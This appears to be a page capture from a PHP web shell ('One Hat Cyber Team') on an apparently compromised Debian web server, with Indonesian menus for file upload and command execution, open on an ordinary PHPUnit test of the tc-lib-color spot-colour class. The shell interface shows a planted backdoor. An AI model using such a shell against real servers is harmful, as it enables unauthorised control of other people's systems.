⚝
One Hat Cyber Team
⚝
Your IP:
192.168.31.6
Server IP:
192.168.1.11
Server:
Linux pams 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
PHP Version:
8.2.28
Buat File
|
Buat Folder
Upload File
Eksekusi
Dir :
~
/
var
/
www
/
lppm
/
vendor
/
tecnickcom
/
tc-lib-color
/
test
/
Edit File: SpotTest.php
<?php /** * SpotTest.php * * @since 2015-02-21 * @category Library * @package Color * @author Nicola Asuni <info@tecnick.com> * @copyright 2015-2024 Nicola Asuni - Tecnick.com LTD * @license http://www.gnu.org/copyleft/lesser.html GNU-LGPL v3 (see LICENSE.TXT) * @link https://github.com/tecnickcom/tc-lib-color * * This file is part of tc-lib-color software library. */ namespace Test; /** * Spot Color class test * * @since 2015-02-21 * @category Library * @package Color * @author Nicola Asuni <info@tecnick.com> * @copyright 2015-2024 Nicola Asuni - Tecnick.com LTD * @license http://www.gnu.org/copyleft/lesser.html GNU-LGPL v3 (see LICENSE.TXT) * @link https://github.com/tecnickcom/tc-lib-color */ class SpotTest extends TestUtil { protected function getTestObject(): \Com\Tecnick\Color\Spot { return new \Com\Tecnick\Color\Spot(); } public function testGetSpotColors(): void { $spot = $this->getTestObject(); $res = $spot->getSpotColors(); $this->assertEquals(0, count($res)); } public function testNormalizeSpotColorName(): void { $spot = $this->getTestObject(); $res = $spot->normalizeSpotColorName('abc.FG12!-345'); $this->assertEquals('abcfg12345', $res); } public function testGetSpotColor(): void { $spot = $this->getTestObject(); $res = $spot->getSpotColor('none'); $this->assertEquals('0.000000 0.000000 0.000000 0.000000 k' . "\n", $res['color']->getPdfColor()); $res = $spot->getSpotColor('all'); $this->assertEquals('1.000000 1.000000 1.000000 1.000000 k' . "\n", $res['color']->getPdfColor()); $res = $spot->getSpotColor('red'); $this->assertEquals('0.000000 1.000000 1.000000 0.000000 K' . "\n", $res['color']->getPdfColor(true)); } public function testGetSpotColorObj(): void { $spot = $this->getTestObject(); $res = $spot->getSpotColorObj('none'); $this->assertEquals('0.000000 0.000000 0.000000 0.000000 k' . "\n", $res->getPdfColor()); $res = $spot->getSpotColorObj('all'); $this->assertEquals('1.000000 1.000000 1.000000 1.000000 k' . "\n", $res->getPdfColor()); $res = $spot->getSpotColorObj('red'); $this->assertEquals('0.000000 1.000000 1.000000 0.000000 K' . "\n", $res->getPdfColor(true)); } public function testAddSpotColor(): void { $spot = $this->getTestObject(); $cmyk = new \Com\Tecnick\Color\Model\Cmyk( [ 'cyan' => 0.666, 'magenta' => 0.333, 'yellow' => 0, 'key' => 0.25, 'alpha' => 0.85, ] ); $spot->addSpotColor('test', $cmyk); $res = $spot->getSpotColors(); $this->assertArrayHasKey('test', $res); $this->assertEquals(1, $res['test']['i']); $this->assertEquals('test', $res['test']['name']); $this->assertEquals('0.666000 0.333000 0.000000 0.250000 k' . "\n", $res['test']['color']->getPdfColor()); // test overwrite $cmyk = new \Com\Tecnick\Color\Model\Cmyk( [ 'cyan' => 0.25, 'magenta' => 0.35, 'yellow' => 0.45, 'key' => 0.55, 'alpha' => 0.65, ] ); $key = $spot->addSpotColor('test', $cmyk); $this->assertEquals('test', $key); $res = $spot->getSpotColors(); $this->assertArrayHasKey('test', $res); $this->assertEquals(1, $res['test']['i']); $this->assertEquals('test', $res['test']['name']); $this->assertEquals('0.250000 0.350000 0.450000 0.550000 k' . "\n", $res['test']['color']->getPdfColor()); } public function testGetPdfSpotObjectsEmpty(): void { $spot = $this->getTestObject(); $obj = 1; $res = $spot->getPdfSpotObjects($obj); $this->assertEquals(1, $obj); $this->assertEquals('', $res); } public function testGetPdfSpotResourcesEmpty(): void { $spot = $this->getTestObject(); $pdfSpotResources = $spot->getPdfSpotResources(); $this->assertEquals('', $pdfSpotResources); } public function testGetPdfSpotObjects(): void { $spot = $this->getTestObject(); $cmyk = new \Com\Tecnick\Color\Model\Cmyk( [ 'cyan' => 0.666, 'magenta' => 0.333, 'yellow' => 0, 'key' => 0.25, 'alpha' => 0.85, ] ); $spot->addSpotColor('test', $cmyk); $spot->getSpotColor('cyan'); $spot->getSpotColor('magenta'); $spot->getSpotColor('yellow'); $spot->getSpotColor('key'); $obj = 1; $res = $spot->getPdfSpotObjects($obj); $this->assertEquals(6, $obj); $this->assertEquals( '2 0 obj' . "\n" . '[/Separation /test /DeviceCMYK <</Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0]' . ' /C1 [0.666000 0.333000 0.000000 0.250000] /FunctionType 2 /Domain [0 1] /N 1>>]' . "\n" . 'endobj' . "\n" . '3 0 obj' . "\n" . '[/Separation /cyan /DeviceCMYK <</Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0]' . ' /C1 [1.000000 0.000000 0.000000 0.000000] /FunctionType 2 /Domain [0 1] /N 1>>]' . "\n" . 'endobj' . "\n" . '4 0 obj' . "\n" . '[/Separation /magenta /DeviceCMYK <</Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0]' . ' /C1 [0.000000 1.000000 0.000000 0.000000] /FunctionType 2 /Domain [0 1] /N 1>>]' . "\n" . 'endobj' . "\n" . '5 0 obj' . "\n" . '[/Separation /yellow /DeviceCMYK <</Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0]' . ' /C1 [0.000000 0.000000 1.000000 0.000000] /FunctionType 2 /Domain [0 1] /N 1>>]' . "\n" . 'endobj' . "\n" . '6 0 obj' . "\n" . '[/Separation /key /DeviceCMYK <</Range [0 1 0 1 0 1 0 1] /C0 [0 0 0 0]' . ' /C1 [0.000000 0.000000 0.000000 1.000000] /FunctionType 2 /Domain [0 1] /N 1>>]' . "\n" . 'endobj' . "\n", $res ); $res = $spot->getPdfSpotResources(); $this->assertEquals('/ColorSpace << /CS1 2 0 R /CS2 3 0 R /CS3 4 0 R /CS4 5 0 R /CS5 6 0 R >>' . "\n", $res); $resk = $spot->getPdfSpotResourcesByKeys(['cyan','yellow']); $this->assertEquals('/ColorSpace << /CS2 3 0 R /CS4 5 0 R >>' . "\n", $resk); } }
Simpan